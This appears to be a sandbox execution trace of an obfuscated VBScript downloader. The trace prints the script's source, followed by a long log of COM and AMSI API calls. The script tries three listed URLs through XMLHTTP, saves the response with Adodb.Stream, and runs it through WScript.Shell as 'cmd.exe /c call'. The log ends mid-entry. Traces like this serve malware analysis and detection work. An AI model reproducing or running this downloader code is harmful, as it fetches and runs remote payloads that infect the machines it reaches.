williams(ATC+11)\r\n\r\n\r\nDomingoauthenticTepir = DomingoauthenticTepir & \"\"&DomingoauthenticPetir & \"ent\"\r\n\r\n krapivec = Array(\"rorymartin8.info/hudgy356?\",\"horoskoperstellung.com/hudgy356?\",\"hosting-jw.de/hudgy356?\")\r\n\r\nlTo = UBound(krapivec)\r\n\r\nDim SendByte\r\n \r\n\r\nExecute \"Sub Svod112(ArrArr) : NotFound404 = 12 : DomingoauthenticMacAttack.R\"& \"un(\"\"cmd.\"&\"exe /c ca\"+\"ll \"\" & ArrArr ) : End Sub\"\r\n\r\nSendByte = -2\r\n\r\n For i = 0 To lTo Step 1\r\nNotFound404 = NotFound404 * 26\r\n\x09on error resume next\r\nValery = Valery +15\r\ndr1=2\r\nNotFound4042 = williams(16-11)\r\n\r\nNotFound404 = NotFound404 + 404\r\n\r\n\r\ndr500 =MarketPlace + krapivec(i)\r\n\r\n DomingoauthenticPython1.Open NotFound4042, dr500, dr501\r\n\r\n\r\nDomingoauthenticPython1.Send\r\n\r\nIf 1005 + DomingoauthenticPython1.Status = 1205 Then\r\nSendByte = i\r\n\r\n Exit For\r\nEnd If\r\n\r\ngoto14:\r\n\r\nNext\r\n\r\n\r\n\r\non error goto 0\r\nif SendByte >= 0 Then\r\nDim Clank 'As String\r\n DomingoauthenticInPlaceOf = Domingoauthenticensurance+ sTempVis\r\n\r\nT2000 \"\",90\r\nDomingoauthentic14 \"\",Save1,DomingoauthenticPython1\r\n\r\nSapogi =90\r\nDomingoauthenticInPlaceOfu = \"\" + DomingoauthenticInPlaceOf \r\nSapogi = Sapogi*90\r\n\r\n\r\nDim DomingoauthenticJohnSnowu,DomingoauthenticDisplay 'As Long\r\nDomingoauthentic13 \"ss\"\r\nDomingoauthenticJohnSnowu = 132\r\n\r\n\r\n\r\nIf 39 < DomingoauthenticJohnSnowu + 17 Then\r\n\x09 \r\n\x09Hipster =NotFound404-NotFound404\r\n\x09\r\nValor = \"\"\"\"\r\n Svod112(Valor & DomingoauthenticInPlaceOf & Valor)\r\n on error resume next\r\n \r\n\r\nEnd If\r\n\r\n\r\nmafia = 90\r\n\x09DomingoauthenticDisplay = \"Re\"\r\nend if") returned 0x12d2 [0020.277] GetCurrentThreadId () returned 0xe9c [0020.285] ISystemDebugEventFire:IsActive (This=0xc4687edc20) returned 0x1 [0020.289] AmsiScanString () returned 0x80070015 [0020.594] AmsiScanString () returned 0x80070015 [0020.596] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0xc4685bde70 | out: lpclsid=0xc4685bde70*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0 [0020.596] SysStringLen (param_1=0x0) returned 0x0 [0020.596] CoGetClassObject (in: rclsid=0xc4685bde70*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffb25108d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bde30 | out: ppv=0xc4685bde30*=0x7ffb23b99390) returned 0x0 [0020.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7ffb23b99390, riid=0x7ffb25108c80*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xc4685bde38 | out: ppvObject=0xc4685bde38*=0x0) returned 0x80004002 [0020.752] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7ffb23b99390, pUnkOuter=0x0, riid=0x7ffb25107388*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bde28 | out: ppvObject=0xc4685bde28*=0xc46aa957f0) returned 0x0 [0020.754] XMLHTTPRequest:IUnknown:Release (This=0x7ffb23b99390) returned 0x1 [0020.754] IUnknown:QueryInterface (in: This=0xc46aa957f0, riid=0x7ffb25108d78*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xc4685bdde8 | out: ppvObject=0xc4685bdde8*=0xc46aa95830) returned 0x0 [0020.754] IObjectWithSite:SetSite (This=0xc46aa95830, pUnkSite=0xc46a84aa00) returned 0x0 [0020.755] IUnknown:AddRef (This=0xc46a84aa00) returned 0x2 [0020.761] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb3ce2eee8*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0xc4685bdbc8 | out: ppvObject=0xc4685bdbc8*=0x0) returned 0x80004002 [0020.764] IUnknown:AddRef (This=0xc46a84aa00) returned 0x3 [0020.764] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb3ce2eef8*(Data1=0x39, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdac8 | out: ppvObject=0xc4685bdac8*=0x0) returned 0x80004002 [0020.764] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb3ce2eea8*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdab0 | out: ppvObject=0xc4685bdab0*=0x0) returned 0x80004002 [0020.764] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb3ce2e4e0*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0xc4685bdad0 | out: ppvObject=0xc4685bdad0*=0x0) returned 0x80004002 [0020.764] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb3ce2e4f0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdac0 | out: ppvObject=0xc4685bdac0*=0x0) returned 0x80004002 [0020.764] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0020.764] IUnknown:AddRef (This=0xc46a84aa00) returned 0x3 [0020.764] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0020.764] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0d0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdd30 | out: ppvObject=0xc4685bdd30*=0xc46a84aa00) returned 0x0 [0020.765] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bcb38 | out: ppvObject=0xc4685bcb38*=0xc46a84aa00) returned 0x0 [0020.765] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e0f0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7ffb23b8ece8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bcb60 | out: ppvObject=0xc4685bcb60*=0x0) returned 0x80004002 [0020.765] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e0b0*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7ffb23b8e0b0*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xc4685bcb80 | out: ppvObject=0xc4685bcb80*=0x0) returned 0x80004002 [0020.765] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e0e0*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7ffb23b8e090*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0xc4685bcb40 | out: ppvObject=0xc4685bcb40*=0x0) returned 0x80004002 [0020.765] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e080*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7ffb23b8e090*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0xc4685bcb40 | out: ppvObject=0xc4685bcb40*=0x0) returned 0x80004002 [0020.765] IUnknown:Release (This=0xc46a84aa00) returned 0x3 [0020.765] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0a0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0xc4685bcc28 | out: ppvObject=0xc4685bcc28*=0x0) returned 0x80004002 [0020.765] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e100*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bcc38 | out: ppvObject=0xc4685bcc38*=0x0) returned 0x80004002 [0020.765] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bcc20 | out: ppvObject=0xc4685bcc20*=0xc46a84aa00) returned 0x0 [0020.765] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e0f0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7ffb23b8ece8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bcc50 | out: ppvObject=0xc4685bcc50*=0x0) returned 0x80004002 [0020.765] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e080*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7ffb23b8e0a0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0xc4685bcc28 | out: ppvObject=0xc4685bcc28*=0x0) returned 0x80004002 [0020.766] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e0e0*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7ffb23b8e090*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0xc4685bcc30 | out: ppvObject=0xc4685bcc30*=0x0) returned 0x80004002 [0020.766] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e080*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7ffb23b8e090*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0xc4685bcc30 | out: ppvObject=0xc4685bcc30*=0x0) returned 0x80004002 [0020.766] IUnknown:Release (This=0xc46a84aa00) returned 0x3 [0020.766] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0020.766] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bdd48 | out: ppvObject=0xc4685bdd48*=0xc46a84aa00) returned 0x0 [0020.766] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb23b8e080*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7ffb23b8e080*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0xc4685bdd40 | out: ppvObject=0xc4685bdd40*=0x0) returned 0x80004002 [0020.766] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0020.766] IUnknown:Release (This=0xc46aa95830) returned 0x1 [0020.766] IUnknown:QueryInterface (in: This=0xc46aa957f0, riid=0x7ffb25107348*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bddf8 | out: ppvObject=0xc4685bddf8*=0xc46aa957b0) returned 0x0 [0020.766] IUnknown:AddRef (This=0xc46aa957b0) returned 0x3 [0020.766] IUnknown:Release (This=0xc46aa957b0) returned 0x2 [0020.766] IUnknown:Release (This=0xc46aa957f0) returned 0x1 [0020.766] IUnknown:AddRef (This=0xc46aa957b0) returned 0x2 [0020.767] CLSIDFromProgIDEx (in: lpszProgID="Adodb.streaM", lpclsid=0xc4685bde70 | out: lpclsid=0xc4685bde70*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4))) returned 0x0 [0020.767] SysStringLen (param_1=0x0) returned 0x0 [0020.767] CoGetClassObject (in: rclsid=0xc4685bde70*(Data1=0x566, Data2=0x0, Data3=0x10, Data4=([0]=0x80, [1]=0x0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6d, [6]=0x2e, [7]=0xa4)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffb25108d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bde30 | out: ppv=0xc4685bde30*=0xc4687e76e0) returned 0x0 [0020.931] Stream:IUnknown:QueryInterface (in: This=0xc4687e76e0, riid=0x7ffb25108c80*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xc4685bde38 | out: ppvObject=0xc4685bde38*=0x0) returned 0x80004002 [0020.932] Stream:IClassFactory:CreateInstance (in: This=0xc4687e76e0, pUnkOuter=0x0, riid=0x7ffb25107388*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bde28 | out: ppvObject=0xc4685bde28*=0xc468840f70) returned 0x0 [0020.935] Stream:IUnknown:Release (This=0xc4687e76e0) returned 0x1 [0020.935] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb25108d78*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xc4685bdde8 | out: ppvObject=0xc4685bdde8*=0xc468840fd0) returned 0x0 [0020.936] IObjectWithSite:SetSite (This=0xc468840fd0, pUnkSite=0xc46a84ada0) returned 0x0 [0020.937] IUnknown:AddRef (This=0xc46a84ada0) returned 0x2 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb3ce2eee8*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0xc4685bdc38 | out: ppvObject=0xc4685bdc38*=0x0) returned 0x80004002 [0020.937] IUnknown:AddRef (This=0xc46a84ada0) returned 0x3 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb3ce2eef8*(Data1=0x39, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdb38 | out: ppvObject=0xc4685bdb38*=0x0) returned 0x80004002 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb3ce2eea8*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdb20 | out: ppvObject=0xc4685bdb20*=0x0) returned 0x80004002 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb3ce2e4e0*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0xc4685bdb40 | out: ppvObject=0xc4685bdb40*=0x0) returned 0x80004002 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb3ce2e4f0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdb30 | out: ppvObject=0xc4685bdb30*=0x0) returned 0x80004002 [0020.937] IUnknown:Release (This=0xc46a84ada0) returned 0x2 [0020.937] IUnknown:AddRef (This=0xc46a84ada0) returned 0x3 [0020.937] IUnknown:Release (This=0xc46a84ada0) returned 0x2 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb23a26ed8*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdd18 | out: ppvObject=0xc4685bdd18*=0x0) returned 0x80004002 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb23a26f28*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bdd20 | out: ppvObject=0xc4685bdd20*=0xc46a84ada0) returned 0x0 [0020.937] IServiceProvider:QueryService (in: This=0xc46a84ada0, guidService=0x7ffb23a26f38*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7ffb23a24848*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0xc4685bdd68 | out: ppvObject=0xc4685bdd68*=0x0) returned 0x80004002 [0020.937] IUnknown:Release (This=0xc46a84ada0) returned 0x2 [0020.937] IUnknown:QueryInterface (in: This=0xc46a84ada0, riid=0x7ffb23a26f28*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bdd28 | out: ppvObject=0xc4685bdd28*=0xc46a84ada0) returned 0x0 [0020.937] IServiceProvider:QueryService (in: This=0xc46a84ada0, guidService=0x7ffb23a26f48*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7ffb23a26f48*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xc4685bdd20 | out: ppvObject=0xc4685bdd20*=0x0) returned 0x80004002 [0020.937] IUnknown:Release (This=0xc46a84ada0) returned 0x2 [0020.937] IUnknown:Release (This=0xc468840fd0) returned 0x1 [0020.937] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb25107348*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bddf8 | out: ppvObject=0xc4685bddf8*=0xc468840f70) returned 0x0 [0020.937] IUnknown:AddRef (This=0xc468840f70) returned 0x3 [0020.937] IUnknown:Release (This=0xc468840f70) returned 0x2 [0020.937] IUnknown:Release (This=0xc468840f70) returned 0x1 [0020.937] IUnknown:AddRef (This=0xc468840f70) returned 0x2 [0020.937] CLSIDFromProgIDEx (in: lpszProgID="Wscript.shell", lpclsid=0xc4685bde70 | out: lpclsid=0xc4685bde70*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0020.938] SysStringLen (param_1=0x0) returned 0x0 [0020.938] CoGetClassObject (in: rclsid=0xc4685bde70*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffb25108d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bde30 | out: ppv=0xc4685bde30*=0xc46a84ad60) returned 0x0 [0021.192] GetVersionExA (in: lpVersionInformation=0xc4685bb9e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7ffb, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xc4685bb9e0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0021.192] GetUserDefaultLCID () returned 0x409 [0021.192] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0xc4685bb550, cchData=2 | out: lpLCData="") returned 2 [0021.192] DllGetClassObject (in: rclsid=0xc4687ec6e0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0xc4685bd810*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bca00 | out: ppv=0xc4685bca00*=0xc46a84ad60) returned 0x0 [0021.192] WshShell:IUnknown:AddRef (This=0xc46a84ad60) returned 0x2 [0021.193] WshShell:IUnknown:Release (This=0xc46a84ad60) returned 0x1 [0021.193] WshShell:IUnknown:QueryInterface (in: This=0xc46a84ad60, riid=0x7ffb25108d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bdb28 | out: ppvObject=0xc4685bdb28*=0xc46a84ad60) returned 0x0 [0021.193] WshShell:IUnknown:Release (This=0xc46a84ad60) returned 0x1 [0021.193] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xc4685bdc50, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0021.193] _strcmpi (_Str1="\\CScript.exe", _Str2="\\wscript.exe") returned -20 [0021.193] _strcmpi (_Str1="\\CScript.exe", _Str2="\\cscript.exe") returned 0 [0021.193] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff770f20000 [0021.193] GetProcAddress (hModule=0x7ff770f20000, lpProcName=0x1) returned 0x7ff770f21350 [0021.194] IUnknown:AddRef (This=0xc4687dace0) returned 0x2 [0021.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0021.194] ITypeInfo:LocalInvoke (This=0xc4687dace0) returned 0x0 [0021.194] IUnknown:Release (This=0xc4687dace0) returned 0x1 [0021.194] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0xc4685bde70 | out: lpclsid=0xc4685bde70*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0021.194] SysStringLen (param_1=0x0) returned 0x0 [0021.194] CoGetClassObject (in: rclsid=0xc4685bde70*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffb25108d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bde30 | out: ppv=0xc4685bde30*=0xc46a84b810) returned 0x0 [0021.198] FileSystemObject:IUnknown:QueryInterface (in: This=0xc46a84b810, riid=0x7ffb25108c80*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0xc4685bde38 | out: 